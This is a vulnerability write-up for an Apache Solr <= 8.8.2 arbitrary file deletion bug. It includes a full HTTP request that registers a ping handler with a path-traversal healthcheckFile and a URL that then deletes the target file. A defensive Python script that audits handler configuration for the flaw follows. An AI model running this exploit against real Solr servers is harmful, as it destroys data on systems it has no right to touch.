1. Download the latest version
https://apache.claz.org/lucene/solr/8.8.2/solr-8.8.2.tgz
2. Start the program
For convenience, I decided to use sample files for demonstration.
solr.cmd -f -e dih
Restart Solr:
solr.cmd -f -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=10010" -port 8983 -s "C:\Solr\solr-8.8.0\example\example-DIH\solr"
3. POC
Step 1:
Create a new file (aaa.txt) in the root directory (C:\aaa.txt).
Step 2:
Create a new request handler:
POST /solr/db/config HTTP/1.1
Host: 192.168.33.130:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type:application/json
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 218

{
  "add-requesthandler": {
    "name": "/testping",
    "class":"solr.PingRequestHandler",
    "defaults":{"echoParams":"explicit"},
    "healthcheckFile":"../../../../../../../../../../../../../aaa.txt",
  }
}
Step 3:
Check whether the handler was created successfully:
http://192.168.33.130:8983/solr/db/config/overlay?omitHeader=true
Step 4:
Visit the URL: http://192.168.33.130:8983/solr/db/testping?action=DISABLE
The file is deleted successfully.
4. Source code in question
org.apache.solr.handler.PingRequestHandler
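A defender-side check for the condition this PoC relies on, added here as an example (not code from the original post or from the Solr project): it reads a /config/overlay response and reports any PingRequestHandler whose healthcheckFile resolves outside the core's data directory. The overlay layout (an "overlay" object holding a "requestHandler" map), the resolution of relative paths against the data directory, the sample data, and the names audit_overlay, escapes_data_dir, SAMPLE_OVERLAY and DATA_DIR are assumptions.

```python
import json
import posixpath

PING_CLASSES = {"solr.PingRequestHandler",
                "org.apache.solr.handler.PingRequestHandler"}

def escapes_data_dir(healthcheck_file, data_dir):
    """True if healthcheckFile resolves to a path outside data_dir."""
    path = healthcheck_file.replace("\\", "/")
    base = posixpath.normpath(data_dir.replace("\\", "/"))
    # An absolute value (POSIX root or Windows drive letter) ignores data_dir.
    if path.startswith("/") or path[1:2] == ":":
        resolved = posixpath.normpath(path)
    else:
        # Assumption: relative values are resolved against the core data dir.
        resolved = posixpath.normpath(posixpath.join(base, path))
    return not (resolved == base or resolved.startswith(base + "/"))

def audit_overlay(overlay_json, data_dir):
    """Return (handler name, healthcheckFile) pairs that leave data_dir."""
    doc = json.loads(overlay_json)
    overlay = doc.get("overlay", doc)  # accept API response or raw file
    findings = []
    for name, cfg in overlay.get("requestHandler", {}).items():
        value = cfg.get("healthcheckFile")
        if cfg.get("class") in PING_CLASSES and value:
            if escapes_data_dir(value, data_dir):
                findings.append((name, value))
    return findings

# Constructed sample of a /config/overlay response (not captured output).
SAMPLE_OVERLAY = json.dumps({"overlay": {"znodeVersion": 0, "requestHandler": {
    "/testping": {"name": "/testping", "class": "solr.PingRequestHandler",
                  "defaults": {"echoParams": "explicit"},
                  "healthcheckFile": "../../../../../../../../../../../../../aaa.txt"},
    "/admin/ping": {"name": "/admin/ping", "class": "solr.PingRequestHandler",
                    "healthcheckFile": "server-enabled.txt"},
}}})
DATA_DIR = "/var/solr/data/db/data"  # constructed core data directory

if __name__ == "__main__":
    for name, value in audit_overlay(SAMPLE_OVERLAY, DATA_DIR):
        print(f"suspicious ping handler {name}: healthcheckFile={value}")
```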
Originally published on the WeChat official account 赛博少女: Apache Solr <= 8.8.2 (latest) arbitrary file deletion